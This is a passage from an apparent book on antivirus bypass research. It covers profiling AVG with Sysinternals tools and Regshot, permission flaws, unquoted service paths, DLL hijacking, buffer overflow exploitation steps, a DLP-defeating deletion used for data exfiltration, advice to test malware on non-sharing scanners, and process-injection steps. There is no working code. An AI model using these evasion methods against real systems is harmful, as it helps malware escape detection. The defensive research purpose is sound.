environment we used to conduct these examples of lead gathering is Windows 10 with AVG 2020 installed. In order to gather leads, we used a range of dynamic malware analysis tools in this chapter, such as the Sysinternals suite (https://docs.microsoft.com/en-us/sysinternals/downloads/ sysinternals-suite) and Regshot (https://sourceforge.net/projects/ regshot/). Working with Process Explorer Once we understand what processes are in the operating system, we will want to see them on our endpoint, in order to gather antivirus research leads. To see a list of processes running on the operating system, we will use the Process Explorer tool (https://docs.microsoft.com/en-us/sysinternals/ downloads/process-explorer), which will provide us with a lot of relevant information about the processes that are running in the operating system: Working with Process Explorer 21 Figure 2.4 – The first glimpse of Process Explorer In Figure 2.4, you can see a list of the processes that are currently running in the Windows operating system, with a lot of other relevant information. 22 Before Research Begins In order to conduct the research in the right way, it is important to understand the data provided by Process Explorer. From left to right, we can see the following information: • Process – the filename of the process with its icon • CPU – the percentage of CPU resources of the process • Private Bytes – the amount of memory allocated to the process • Working Set – the amount of RAM allocated to this process • PID – the process identifier • Description – a description of the process • Company Name – the company name of the process: Figure 2.5 – Process Explorer columns Process Explorer gives the option to add more columns, to get more information about any process in the operating system. You can get the information by right-clicking on one of the columns and then clicking Select Columns: Figure 2.6 – The Select Columns button After clicking the Select Columns button, a window with additional options will open, and you can click on the options that you want to additionally add to the main Process Explorer columns: Working with Process Explorer 23 Figure 2.7 – Select Columns options To get data about a specific process in the operating system, we can double-click on the process name and then we will get the following window: Figure 2.8 – Interesting data about the process we clicked 24 Before Research Begins Some interesting data about the process can include the following: • Image – information about the process, including its version, build time, path, and more • Performance – information regarding the performance of the process • Performance Graph – graph-based information regarding the performance of the process • Disk and Network – the count of disk and network Input/Output (I/O) • CPU Graph – graph-based data about the CPU usage, dedicated GPU memory, system GPU memory, and more • Threads – the threads of the process • TCP/IP – ingoing and outgoing network connections • Security – the permissions of the process • Environment – the environment variables • Job – the list of processes that are assigned to a job object • Strings – strings that are part of the process (image-level and memory-level) In order for the antivirus software to conduct monitoring on every process that exists within the operating system, it usually executes a hook. This hook is usually a DLL that is injected into every process running within the operating system, and it contains within it some type of information that will interest us later on. In order to view which DLLs are involved, along with their names and paths, we can use the Process Explorer tool, find the process we wish to investigate, select it by clicking on it, then press Ctrl + D. This is the result: Working with Process Explorer 25 Figure 2.9 – Two interesting DLL files of AVG Antivirus We can see here (in the rectangle in Figure 2.9) that two DLLs of AVG Antivirus have been added to the process in the operating system. Later on, these leads can be further investigated. Let's do the same thing, but this time on the System process (PID 4): Figure 2.10 – Twelve interesting sys files of AVG Antivirus Here, we can see that 12 AVG sys files have been loaded to the System process. 26 Before Research Begins Including the two DLLs we saw in the previous screenshot, we now have 14 files we can investigate later on, and these are our 14 leads for future research. Tip You can use Process Explorer's Description column to shorten your research time and it can help you understand what a file is supposed to do. Working with Process Monitor Now that we have seen how to gather leads using Process Explorer as well as which antivirus processes are running and monitoring the actions of the operating system without any user involvement, we can continue gathering research leads. This time, we will find the process the antivirus software uses to conduct file scans. We'll locate this lead through operating system monitoring using the Process Monitor tool. Processor Monitor (https://docs.microsoft.com/en-us/sysinternals/ downloads/procmon) is a tool that can be used to observe the behavior of each process in the operating system. For example, if we run the notepad.exe process, writing content into it, and then save the content into a file, Process Monitor will be able to see everything that happened from the moment we executed the process, until the moment we closed it, like in the following example: Working with Process Monitor 27 Figure 2.11 – Actions of notepad.exe shown in Process Monitor 28 Before Research Begins You can double-click on any of the events to get more data about a specific event. The following screenshot is the Event Properties window after we double-clicked it: Figure 2.12 – Event Properties window in Process Monitor There are three tabs that can help us to know more about the event: • Event – information about the event, such as the date of the event, the result of the operation that created the event, the path of the executable, and more • Process – information about the process in the event • Stack – the stack of the process Before we run a scan on a test file, we first need to run Process Monitor (procmon.exe). After starting up Process Monitor, we can see that there are many processes executing many actions on the operating system, so we need to use filtering. The filter button is on the main toolbar: Figure 2.13 – The filter button Working with Process Monitor 29 We will need to use filtering by company because the company name is the one absolutely certain thing we know about the process that's about to be executed. We don't know the name of the process that's going to be executed on the disk, and we don't know what its process ID will be, but we know the company name we are looking for will be AVG. To the company name, we can add the contains condition: Figure 2.14 – Filter by company name example Then, with the Process Monitor tool running in the background, let's take the test file we want to scan, right-click on it, and select Scan selected items for viruses: Figure 2.15 – The Scan selected items for viruses button 30 Before Research Begins After selecting Scan selected items for viruses, we will return to Process Monitor and observe that two processes are involved in the scan – one called AVGUI.exe and one called AVGSvc.exe: Figure 2.16 – The results of the filter we used From this, we can now conclude that the AVGSvc.exe process, which is the AVG service, is also involved in scanning the file for viruses. After that, the process called AVGUI.exe, which is AVG's GUI process, begins executing. So based on this, we can add these two processes to our research leads list. After the file scanning, it is possible to see the execution flow in a tree view of the antivirus processes that were involved in the file scanning, by pressing Ctrl + T: Working with Process Monitor 31 Figure 2.17 – The Process Tree window of Process Monitor The Process Tree view can give us a lot of information about the flow of executed processes in the system that can indicate to us which parent processes create which child processes. This can help us understand the components of the antivirus software. Tip To show only EXE files in Process Monitor, you can filter by Path and choose the condition ends with, specifying the value .exe: Figure 2.18 – Filter by Path followed by the .exe extension Now that we have seen how to work with tools regarding system processes, such as Process Explorer and Process Monitor, let's learn how to work with more tools that will give us more antivirus research leads. 32 Before Research Begins Working with Autoruns As in all operating systems, Windows contains many places where persistence may be used, and just as malware authors do, antivirus companies want to make use of persistence to start their processes when the operating system starts up. In Windows, there are many places where it is possible to place files that will be started when the operating system starts up, such as the following: • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\RunOnce • HKLM\System\CurrentControlSet\Services • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer\Run • %AppData%\Microsoft\Windows\Start Menu\Programs\Startup But you will not need to memorize all these locations, because there is a tool called Autoruns (https://docs.microsoft.com/en-us/sysinternals/ downloads/autoruns) for exactly this purpose. Using Autoruns, we can display all the locations where persistence can take place within the operating system. And for each location, we can create a list of files that start up with the operating system. Using these lists, we can gather even more leads for antivirus research. When we run Autoruns, we can also use filters, and this time as well, we are going to specify a string, which is the name of the antivirus software – AVG: Figure 2.19 – Filter by AVG results in Autoruns Working with Regshot 33 After filtering the string of AVG, Autoruns displays dozens of AVG files that start up with the operating system. Besides the name of the file, each line also includes the location of the file, its description, publisher name, and more. The files displayed by Autoruns can include critical AVG files and, if a particular file doesn't run, the antivirus program can't work properly. So, it is only logical that these are the files we should choose to focus on for future research, and we will gather these files as leads to make our research more efficient. Working with Regshot While gathering leads to conduct antivirus research, we also need to understand which registry values the antivirus software has added to help us figure out which files and registry values it has added. To gather this information, we're going to use the Regshot tool. Regshot is an open source tool that lets you take a snapshot of your registry, then compare two registry shots, before and after installing a program. To take the first shot, we open the tool, define whether we want the output in HTML or plain text format, define the save location of the file, and then click 1st shot: Figure 2.20 – The 1st shot button in Regshot 34 Before Research Begins Only after taking the first shot will we install the antivirus software we are interested in researching. After completing the installation, go back into Regshot and click 2nd shot: Figure 2.21 – The 2nd shot button in Regshot After taking the second shot, you can then click Compare. This will create an output file of the type selected by the user (plain text or HTML). This output file will display all registry changes that took place after installing the antivirus software: Working with Regshot 35 Figure 2.22 – AVG Antivirus Regshot diff results Obviously, in order to gather leads, we have to gather these locations of registry values, but what's interesting is that these are mainly EXE and DLL files. If we search within this output file for DLL and EXE files, we can get even more valuable results: Figure 2.23 – Accessing the registry via PowerShell 36 Before Research Begins Also, it is good to know that you do not have to use Regedit or any other third-party tools like Regshot to access and search the registry; you can use PowerShell as seen in the preceding screenshot. Third-party engines Finally, it is important to realize that some antivirus software companies use third-party engines produced by other companies. Here's a full list of vendors and the third-party engines they use (https://www. av-comparatives.org/list-of-consumer-av-vendors-pc/): Table 2.1 – Antivirus third-party static engines Understanding which antiviruses share third-party engines means that when you are gathering leads for one antivirus software, you can shorten your research time and use the same leads for another antivirus software. Summary 37 Summary Gathering leads is a critical step in the process of preparing to research antivirus software. In this chapter, we have demonstrated several tools from the Sysinternals suite as well as the Regshot utility. Using these, we can gather up leads to get ready for this research. We recommend continuing to look for more tools to help locate additional leads. There are also other excellent dynamic malware analysis tools you can use. In the next chapter, we will discuss our two antivirus bypass approaches, the fundamentals of the Windows operating system, the protection rings model, and more. 3 Antivirus Research Approaches In this chapter, you will learn about the Windows operating system protection rings concept, we will introduce two of our real-life bypass examples, and you will also learn the basic three vulnerabilities that can be used to bypass antivirus software. After explaining what leads are, how they help us, and how to gather them to start conducting antivirus research, we have now come to the stage where it is time to choose which approach is most appropriate for conducting research on antivirus software and then starting to research the leads we found in the previous chapter. In this chapter, we will go through the following topics: • Understanding the approaches to antivirus research • Introducing the Windows operating system • Understanding protection rings • Protection rings in the Windows operating system • Windows access control list 40 Antivirus Research Approaches • Permission problems in antivirus software • Unquoted Service Path • DLL hijacking • Buffer overflow Understanding the approaches to antivirus research There are two main approaches to antivirus research. Both ultimately need to lead to the same result, which is always bypassing antivirus software and running malicious code on the user's endpoint. The two antivirus research approaches are the following: • Finding a vulnerability in antivirus software • Using a detection bypass method As with any code, antivirus software will also contain vulnerabilities that can be taken advantage of. Sometimes, these vulnerabilities may allow controlling the antivirus software's means of detection, prevention, or both. In upcoming sections, we will look at a few possible vulnerabilities that can help us bypass antivirus software. Important note There are a lot of vulnerabilities that we can use to bypass antivirus software, beyond the vulnerabilities we have mentioned in this chapter. For a more comprehensive list of vulnerabilities, check the following link: https:// cve.mitre.org/cgi-bin/cvekey.cgi?keyword=antivirus. Introducing the Windows operating system As in this book we are discussing bypassing Windows-based antivirus software, we will now discuss the Windows operating system and its security protection mechanisms. The earliest Windows operating systems were developed for specific CPUs and other hardware specifications. Windows NT introduced a new breed of Windows, a process- independent operating system that also supports multiprocessing, a multi-user environment, and offers a separate version for workstations and servers. Introducing the Windows operating system 41 Initially, Windows NT was written for 32-bit processors, but it was later expanded to a broader architecture range, including IA-32, MIPS, Itanium, ARM, and more. Microsoft also added support for 64-bit CPU architectures along with major new features such as Windows API/Native API, Active Directory, NTFS, Hardware Abstraction Layer, security improvements, and many more. Over the years, many parties criticized Microsoft for its lack of emphasis on information security in the Windows operating systems. For example, in the following screenshot, we can see that even the authors of the Blaster malware complained about the security of the Windows OS: Figure 3.1 – Blaster malware asks Bill "billy" Gates to fix his software With time, Microsoft decided to change its approach and implement several security mechanisms against common attacks that exploited built-in operating system-level vulnerabilities. The prominent implemented security mechanisms are as follows: • ASLR – Address Space Layout Randomization • DEP – Data Execution Prevention • SEHOP – Structured Exception Handling Overwrite Protection 42 Antivirus Research Approaches The ASLR security mechanism prevents malware from exploiting security vulnerabilities that are based on expected memory locations in the operating system. ASLR does this by randomizing the memory address space and loads crucial DLLs into memory addresses that were randomized at boot time: Figure 3.2 – ASLR illustration In the preceding screenshot, you can see that DLL files are loaded into ASLR-randomized memory locations at boot time. The DEP memory security mechanism prevents code from executing on specific memory regions that are marked as a non-executable memory page. This in turn prevents or at least hardens exploitation attempts of buffer overflow vulnerabilities. The SEHOP runtime security mechanism prevents the exploitation attempts of malicious code by abusing the SEH operating system structure by using the exploitation technique of SEH overwrite. This security mechanism can also be deployed by a Group Policy setting of Process Mitigation Options. After the introduction of the Windows operating system and its security mechanisms, let's continue with protection rings. Understanding protection rings Before we explain vulnerabilities that can be exploited because of permission problems, it is important to understand the concept of protection rings in operating systems. The term protection ring refers to a hierarchical mechanism implemented on CPUs and utilized by operating systems such as Windows to protect the system by providing fault tolerance and, of course, to better protect from malicious activity and behavior. Each ring in this mechanism has a unique role in the overall functioning of the operating system, as seen in the following illustration: Protection rings in the Windows operating system 43 Figure 3.3 – Protection ring layers The lower the number of the ring, the closer it is to the hardware and, therefore, the higher its privilege level. As you can see in the illustration, Ring 0 is the operating system kernel, which provides "back-to-back" access to the hardware from the higher rings and vice versa. Antivirus software tends to deploy its inspection mechanisms in the lower rings, mostly as a driver. The lower rings offer more visibility to the antivirus engine, letting it inspect actions conducted on the operating system, including malicious actions. Protection rings in the Windows operating system The lower the ring, the more privileges and visibility it has in the overall operating system. As the wise saying goes, "With great power comes great responsibility". Here are brief descriptions of the roles of each of these rings, moving from the outside in: • Ring 3 – This ring is also known as "user mode", "userland", or "userspace". As the name suggests, this ring is where the user interacts with the operating system, mainly through the GUI (Graphical User Interface) or command line. Any action taken by a program or process in the operating system is actually transferred to the lower rings. For example, if a user saves a text file, the operating system handles it by calling a Windows API function such as CreateFile(), which, in turn, transfers control to the kernel (Ring 0). The kernel, in turn, handles the operation by transferring the logical instructions to the final bits, which are then written to a sector in the computer's hard drive. 44 Antivirus Research Approaches • Rings 2 and 1 – Ring 2 and 1 are designed generally for device drivers. In a modern operating system, these rings are mostly not used. • Ring 0 – Ring 0, the kernel, is the lowest ring in the operating system and is therefore also the most privileged. For malware authors, accessing this lowest layer of the operating system is a dream come true, offering the lowest-to-highest visibility of the operating system to get more critical and interesting data from victim machines. The main goal of the kernel is to translate actions in a "back-to- back" manner issued by the higher rings to the hardware level and vice versa. For instance, an action taken by the user such as viewing a picture or starting a program ultimately reaches the kernel. The following diagram demonstrates the Windows API execution flow from user to kernel space: Figure 3.4 – The execution flow of the CreateFileW Windows API to the kernel Some believe that antivirus software must be installed in Ring 0, the kernel level of the operating system. This is actually a common misconception because, ideally, the only programs running in Ring 0 will be drivers or other software strictly related to hardware. As previously explained, in order for antivirus software to gain visibility of operating system files, it needs to be installed in a lower ring than ring 3 as well as to be protected from specific user interactions. Every antivirus software has Ring 3 components, especially detection components that can be configured insufficiently to allow a regular user (non-admin user) to discover permissions-based vulnerabilities. Windows access control list 45 The following table shows the permission levels of the Windows operating system Discretionary Access Control List (DACL): Table 3.1 – The Windows permission levels As can be seen in the preceding table, we have a list of permissions and each one of them has a unique capability in the operating system, such as writing and saving data to the hard disk, reading data from a file, the execution of files, and more. Windows access control list Each file in the operating system, including executables, DLL files, drivers, and other objects, has permissions based on the configured Access Control List (ACL). The ACL in the Windows operating system is referred as the DACL and it includes two main parts: • The first part is the security principal that receives the relevant permissions. • The second part is the permissions that the object receives in addition to other inherited permissions. 46 Antivirus Research Approaches Each of these objects is considered as a define acronym in the Access Control List. In the following screenshot, we can see an example of such an acl: Figure 3.5 – File security properties (DACL) In the preceding screenshot, we can see the entities or the security principal objects that will receive the relevant permissions. Permission problems in antivirus software 47 Permission problems in antivirus software The following are two examples of permission problems that can arise with antivirus software. Insufficient permissions on the static signature file During our research, we found antivirus software whose static signature file had insufficient permissions. This meant that any low-privileged user could erase the contents of the file. When the antivirus software then scanned files, it would be comparing them to an empty signature file. We notified the antivirus vendor about this vulnerability and they released an update with a patch that fixed the vulnerability. Improper privileges Permission problems can occur not only in antivirus software but in all kinds of security solutions. In one of our research journies, we researched a Data Loss Prevention (DLP) security solution of company named Symantec. This software's primary goal is to block and prevent the leakage of sensitive data from the organization's network endpoints by means of storage devices such as external hard drives, USB thumb drives, or file upload to servers outside the network. After a simple process of lead gathering, we found the process name of the DLP solution and the full paths of these loaded processes in the file system along with their privilege level. We discovered that the Symantec DLP agent had been implemented with improper privileges. This means that a user (mostly administrative-privileged user) with escalated privileges of NT AUTHORITY\SYSTEM could exploit the potential vulnerability and delete all files within the DLP folder. In this case, after we had escalated our privileges from Administrator to SYSTEM (using the Sysinternals-PSexec utility), and after we had gathered sufficient leads indicating the full path of the DLP folder (using the Sysinternals-Process Explorer utility), we deleted the folder contents and rebooted the machine. With this accomplished, we were able to successfully exfiltrate data from the organization's machine, utterly defeating the purpose of this costly and complicated DLP solution. We contacted Symantec regarding this vulnerability and they released a newer version where the vulnerability is patched and fixed. Permission problems can also manifest as an an Unquoted Service Path vulnerability. 48 Antivirus Research Approaches Unquoted Service Path When a service is created within the Windows operating system whose executable path contains spaces and is not enclosed within quotation marks, the service will be susceptible to an Unquoted Service Path vulnerability. To exploit this vulnerability, an executable file must be created in a particular location in the service's executable path, and instead of starting up the antivirus service, the service we created previously will load first and cause the antivirus to not load during operating system startup. When this type of vulnerability is located on an endpoint, regardless of which antivirus software is in place, it can be exploited to achieve higher privileges with the added value of persistence on the system. For antivirus bypass research, this vulnerability can be used for a different purpose, to force the antivirus software to not load itself or one of its components so it will potentially miss threats and in that way, the vulnerability can bypass the antivirus solution. In December 2019, we publicized an Unquoted Service Path vulnerability in Protegent Total Security version (Protegent Total Security - Unquoted Service Path – https://cxsecurity.com/issue/WLB-2019120105): Figure 3.6 – Protegent Total Security – Unquoted Service Path vulnerability Another vulnerability that could help us bypass antivirus software is DLL preloading/ hijacking. DLL hijacking 49 DLL hijacking This vulnerability takes advantage of the insecure DLL loading mechanism in the Windows operating system. When software wants to load a particular DLL, it uses the LoadLibraryW() Windows API call. It passes as a parameter to this function the name of the DLL it wishes to load. We do not recommend using the LoadLibrary() function, due to the fact that it is possible to replace the original DLL with another one that has the same name, and in that way to cause the program to run our DLL instead of the originally intended DLL. In non-antivirus software, this vulnerability can have a low/medium severity level, but in the context of antivirus software, this vulnerability could reach critical severity, since we could actually cause the antivirus to load and run a malicious DLL. In certain cases, it could even cause the DLL to disable the antivirus itself or even aid in bypassing white-list mechanisms. Important note In order to exploit a DLL hijacking vulnerability in antivirus software, many times you will need to achieve high privileges before the exploitation can take place. In recent years, many vulnerabilities of this type have emerged in antivirus software from leading vendors, such as AVG and Avast (CVE-2019-17093) (https://nvd.nist. gov/vuln/detail/CVE-2019-17093), Avira (CVE-2019-17449) (https:// nvd.nist.gov/vuln/detail/CVE-2019-17449), McAfee (CVE-2019-3648) (https://nvd.nist.gov/vuln/detail/CVE-2019-3648), Quick Heal (CVE- 2018-8090) (https://nvd.nist.gov/vuln/detail/CVE-2018-8090), and more. Another vulnerability that can help us to bypass antivirus software is buffer overflow. 50 Antivirus Research Approaches Buffer overflow A buffer overflow (or overrun) is a very common and well-known attack vector that is mostly used to "overflow" vulnerable programs. This involves sending a large amount of data, which is handled without proper input validation, causing the program to fail in one of a number of ways. Once this vulnerability has been exploited, it can be used to inject malicious shellcode and take full control of the victim's device. Over the years, buffer-overflow vulnerabilities have also been exploited in the wild to bypass security mechanisms such as antivirus software, both through bypassing antivirus engines and through gaining full control of the target victim machine. There are two types of buffer overflow vulnerabilities that can be exploited: • Stack-based buffer overflow • Heap-based buffer overflow To keep things simple, we will focus on stack-based buffer overflow, since the goal of this book is to bypass antivirus software and not primarily exploiting these vulnerabilities. So we will explore how to exploit a stack-based buffer overflow and how to use it to bypass antivirus software. There are two approaches to locate buffer overflow vulnerabilities, whether stack- or heap- based: manual and automated. The manual approach involves searching manually for user-based inputs such as program arguments and determining the mechanism behind the user input and the functionalities it uses. To do this, we can make use of tools such as disassemblers, decompilers, and debuggers. The automated approach involves using tools known as "fuzzers" that automate the task of finding user inputs and, potentially, finding vulnerabilities in the mechanisms and functionalities behind the code. This activity is known as "fuzzing" or "fuzz testing." There are several types of fuzzers that can be used for this task: • Mutation-based • Dumb • Smart • Structure-aware Summary 51 Stack-based buffer overflow This vulnerability can be exploited if there is no proper boundary input validation. The classic example involves using functions such as strcat() and strcpy(), which does not verify the length of the input. These functions can be tested dynamically using fuzzers or even manually using disassemblers such as IDA Pro and debuggers such as x64dbg. Here are the general steps to take to exploit this type of vulnerability: 1. Make the program crash to understand where the vulnerability occurs. 2. Find the exact number of bytes to overflow before we reach the beginning address of the EIP/RIP (instruction pointer) register. 3. Overwrite the EIP/RIP register to point to the intended address of the injected shellcode. 4. Inject the shellcode into the controllable intended address. 5. Optionally, inject NOP (no-operation) sleds if needed. 6. Jump to the address of the injected payload to execute it. There are many ways of achieving this goal, including using a combination of "leave" and "ret" instructions, facilitating Return-Oriented Programming (ROP) chains, and more. Buffer overflow – antivirus bypass approach Sometimes antivirus software does not use proper boundary input validation in one or even several of the antivirus engine components. For example, if the unpacking engine of an antivirus program tries to unpack malware with an allocated buffer for file contents and it uses a function called strcpy() to copy a buffer from one address to another, an attacker can potentially overflow the buffer, hijack the extended instruction pointer (EIP) or RIP register of the antivirus engine process and make it jump to another location so the antivirus will not check a file even if it is malicious, or even crash the antivirus program itself. Summary In this chapter, we presented to you two of our main antivirus bypass approaches (vulnerability-based bypass and detection-based bypass) and detailed the first approach, the approach of discovering new vulnerabilities that can help us to bypass the antivirus software. There are several types of vulnerabilities that can achieve a successful antivirus bypass. In the next three chapters, we will discuss and go into details of the second approach, using many bypass methods followed by 10 practical examples. Section 2: Bypass the Antivirus – Practical Techniques to Evade Antivirus Software In this section, we'll explore practical techniques to bypass and evade modern antivirus software. We'll gain an understanding of the principles behind bypassing dynamic, static, and heuristic antivirus engines and explore modern tools and approaches to practically bypass antivirus software. This part of the book comprises the following chapters: • Chapter 4, Bypassing the Dynamic Engine • Chapter 5, Bypassing the Static Engine • Chapter 6, Other Antivirus Bypass Techniques 4 Bypassing the Dynamic Engine In this chapter, you will learn the basics of bypassing the dynamic engine of an antivirus software. We will learn how to use VirusTotal and other antivirus engine detection platforms to identify which antivirus software we managed to bypass. Furthermore, we will go through understanding and implementing different antivirus bypass techniques that can be used to potentially bypass antivirus engines, such as process injection, the use of a dynamic-link library (DLL), and timing-based techniques to bypass most of the antivirus software out there. In this chapter, you will achieve an understanding of practical techniques to bypass antivirus software, and we will explore the following topics: • The preparation • VirusTotal • Antivirus bypass using process injection • Antivirus bypass using a DLL • Antivirus bypass using timing-based techniques 56 Bypassing the Dynamic Engine Technical requirements To follow along with the topics in the chapter, you will need the following: • Previous experience in antivirus software • Basic understanding of memory and processes in the Windows operating system • Basic understanding of the C/C++ or Python languages • Basic understanding of the Portable Executable (PE) structure • Nice to have: Experience using a debugger and disassemblers such as the Interactive Disassembler Pro (IDA Pro) and x64dbg Check out the following video to see the code in action: https://bit.ly/2Tu5Z5C The preparation Unlike when searching for vulnerabilities and exploiting them, bypass techniques do not mainly deal with antivirus engine vulnerability research. Instead, they deal more with writing malware that contains a number of bypass techniques and then test the malware containing these techniques against the antivirus engines we seek to bypass. For example, if we want to find a particular vulnerability in an antivirus engine, we need to the following: 1. We need to gather research leads. Then, for each lead, we will have to determine what the lead does, when it starts running, whether it is a service, whether it starts running when we scan a file, and whether it is a DLL injected into all processes, along with many further questions to help guide our research. 2. After that, we need to understand which vulnerability we are looking for, and only then can we actually begin researching antivirus software to find the vulnerability. 3. To use a bypass technique, we first of all need to gather research leads, and after that, we start writing malware code that contains several relevant bypass techniques. 4. Then, we begin the trial-and-error stage with the malware we have written, testing whether it manages to bypass the antivirus software, and draw conclusions accordingly. The preparation 57 When a particular technique succeeds in bypassing specific antivirus software, it is always a good idea to understand why it succeeded and which engine in the antivirus software has been bypassed (static, dynamic, or heuristic). We can apply this understanding to the leads we have gathered to perform reverse engineering so that we can be sure that the technique indeed succeeds in bypassing the engine. Of course, at the end of this process, it is essential to report the bypass to the software vendor and suggest solutions on how to improve their antivirus software. Note Because of legal implications, we sometimes use pseudo code and payloads in this book. Basic tips for antivirus bypass research Before beginning antivirus bypass research, here are a few important points to keep in mind: • Use the most recent version of the antivirus software. • Update the signature database to the most current version to make sure you have the newest static signatures. • Turn off the internet connection while conducting research, since we do not want the antivirus software making contact with an external server and signing a bypass technique we have discovered. • Use the most recent version of the operating system with the latest knowledge base (KB) so that the bypass will be effective. Now that we are familiar with the topic of antivirus bypass research, let's learn about the importance of using VirusTotal and other platforms as part of our research. 58 Bypassing the Dynamic Engine VirusTotal In this book and in research of antivirus bypass techniques in general, we will use platforms such as VirusTotal a lot. VirusTotal (https://www.virustotal.com/) is a very well-known and popular malware-scanning platform. VirusTotal includes detection engines of various security vendors that can be checked against when uploading files, to check whether these detection engines detect a file as malware or even as suspicious, searching values such as the Uniform Resource Locator (URL), Internet Protocol (IP) addresses, and hashes of already uploaded files. VirusTotal provides many more features, such as a VirusTotal graph, which provide the capability to check relations of files, URLs, and IP addresses and cross-referencing between them. Platforms such as VirusTotal are very useful to us to understand whether our malware that is based on some of our bypass techniques actually bypasses part—or even all—of the antivirus engines present in the relevant platform. Furthermore, if our malware is detected in one or more antivirus engines, the name of the signature that detected our malware is presented to us so that we can learn from it and adapt accordingly. The home page of VirusTotal is shown in the following screenshot: Figure 4.1 – virustotal.com VirusTotal 59 When we upload a file to VirusTotal, the site sends the file to many antivirus engines to check if the file is malicious. If any engine has detected the file as a malicious file, VirusTotal will show us the name of the antivirus software that detected the malware, with the name of the signature highlighted in red. Once we uploaded a file to VirusTotal, VirusTotal will check if the hash already exists in its database. If so, it will show the latest scanning results, and if not, VirusTotal will submit the file to check whether the file is a malicious one. For example, here is a file that was detected as malware in multiple antivirus engines, as displayed by VirusTotal: Figure 4.2 – VirusTotal scanning score results In order to better detect malware, VirusTotal includes an internal sandbox called VirusTotal Jujubox. VirusTotal Jujubox is a Windows-based behavioral analysis sandbox that will show its results as a report, as part of the results of many scanned files. 60 Bypassing the Dynamic Engine The Jujubox sandbox extracts important behavioral information regarding the execution of malicious files, including file input/output (I/O) operations, registry interactions, dropped files, mutex operations, loaded modules such as DLLs and executables, JA3 hashing, and use of Windows Application Programming Interface (API) calls. Furthermore, it supports the interception of network traffic including HyperText Transfer Protocol (HTTP) calls, Domain Name System (DNS) resolutions, Transmission Control Protocol (TCP) connections, the use of Domain Generation Algorithms (DGAs), providing a dump of packet capture (PCAP) files, and more. In order to display the full results of the Jujubox sandbox, you need to go to the BEHAVIOR tab, click on VirusTotal Jujubox, and then click on Full report, as illustrated in the following screenshot: Figure 4.3 – VirusTotal's BEHAVIOR tab After that, a new window will open that will include details from VirusTotal Jujubox— for example, Windows API Calls, a Process tree, Screenshots, and more, as illustrated in the following screenshot: Figure 4.4 – VirusTotal Jujubox page Let's now look at alternatives to VirusTotal. VirusTotal alternatives 61 VirusTotal alternatives In addition to VirusTotal, you have various other alternatives, such as VirScan (https://www.virscan.org/language/en/) and Jotti's malware scan (https://virusscan.jotti.org/). The following screenshot shows an example of VirScan detections: Figure 4.5 – VirScan detections 62 Bypassing the Dynamic Engine The following screenshot shows an example of Jotti's malware scan detections: Figure 4.6 – Jotti's malware scan detections Important note Although we tested our malware with VirusTotal, we strongly discourage you from doing this. VirusTotal has a policy that all files and URLs shared with them will be shared with antivirus vendors and security companies—in their words, "to help them in improving their products and services". As a result of this policy, any antivirus software that cannot yet detect the malware you have created will receive a report not only about your payload structure but also about the methodology behind it, improving their ability to detect this type of payload in the future. For that reason, we recommend you only test your malware on sites that do not share information, such as AntiScan.Me (https://antiscan.me/). Now that we know about VirusTotal and its alternatives, we will move on to learning about the bypass techniques we used during our research. Using these techniques, you will be able to successfully bypass most of the world's leading antivirus software. Antivirus bypass using process injection 63 Antivirus bypass using process injection One of the central challenges of malware authors is to hide malware from both antivirus software and users. That is not an easy challenge. Originally, malware authors relied on the simple technique of changing the malware's name to a legitimate filename that would arouse suspicion within the system, such as svchost.exe or lsass.exe. This technique worked on ordinary users who lack a basic understanding of and a background in computers and technology but, of course, it did not work on knowledgeable users with an understanding of how operating systems and antivirus software work. This is where the process-injection technique enters the picture. What is process injection? Process injection is one of the most common techniques used to dynamically bypass antivirus engines. Many antivirus vendors and software developers rely on so-called process injection or code injection to inspect processes running on the system. Using process injection, we can inject malicious code into the address space of a legitimate process within the operating system, thereby avoiding detection by dynamic antivirus engines. Most of the time, achieving this goal requires a specific combination of Windows API calls. While writing this book we used about five methods to do so, but we will explain the three most basic of these techniques for injecting code into a target process. It is worth mentioning that most antivirus engines implement this practice in order to inspect malicious code in processes running within the operating system. But it is not only antivirus vendors who take advantage of this ability, but also threat actors, who abuse it to inject their malicious code for purposes such as logging keystrokes, hiding the presence of malware under other legitimate processes, hooking and manipulation of functions, and even for the purpose of gaining access to escalated privilege levels. Before we understand what process injection is, we need to know about the concept of a process address space. 64 Bypassing the Dynamic Engine Process address space A process address space is a space that is allocated to each process in the operating system based on the amount of memory the computer has. Each process that is allocated memory space will be given a set of memory address spaces. Each memory address space has a different purpose, depending on the programmer's code, on the executable format used (such as the PE format), and on the operating system, which actually takes care of loading the process and its attributes, mapping allocated virtual addresses to physical addresses, and more. The following diagram shows a sample layout of a typical process address space: Figure 4.7 – Process address space Now that we understand what process injection is, we can proceed further to understand the steps and different techniques to achieve process injection. Antivirus bypass using process injection 65 Process-injection steps The goal of process injection, as mentioned previously, is to inject a piece of code into the process memory address space of another process, give this memory address space execution permissions, and then execute the injected code. This applies not merely to injecting a piece of shellcode but also to injecting a DLL, or even a full executable (EXE) file. To achieve this goal, the following general steps are required: 1. Identify a target process in which to inject the code. 2. Receive a handle for the targeted process to access its process address space. 3. Allocate a virtual memory address space where the code will be injected and executed, and assign an execution flag if needed. 4. Perform code injection into the allocated memory address space of the targeted process. 5. Finally, execute the injected code. The following diagram depicts this entire process in a simplified form: Figure 4.8 – Process injection diagram Now that we have this high-level perspective into how process injection or code injection is performed, let's turn to an explanation of Windows API functions. 66 Bypassing the Dynamic Engine Windows API Before delving into what Windows API functions are, we first need to have an understanding of what an API is in a general sense. An API is a bridge between two different applications, systems, and architectures. Practically speaking, the main goal of an API function is to abstract underlying implementations, to aid developers in creating programs. The Windows API is Microsoft's core set of APIs, allowing developers to create code that interacts with underlying, prewritten functionality provided by the Windows operating system. Why we need the Windows API To understand the concept more clearly, the following is a simple "Hello World" program coded in C: #include <stdio.h> int main(void) {     printf("Hello, World!\n"); } Notice that in the preceding code snippet, there is an import of stdio.h, known as a header file. The import is done using the #include directive. This header file provides a function called printf that takes one parameter: the string intended to be printed. The printf function itself actually contains a relatively large amount of code simply to print out a basic string. This is a great example because it highlights the importance of Windows API functions. These provide us with much essential functionality that we would otherwise need to develop ourselves. With access to API-based functions, we can create code more easily and efficiently, and in a more clear and elegant way. Windows APIs and Native APIs – the differences To understand more deeply what is going on under the hood of the Windows operating system, we also need to look at the differences between Windows APIs and Native APIs. Windows API functions are user-mode functions that are fully documented on Microsoft's site at msdn.microsoft.com. However, most Windows API 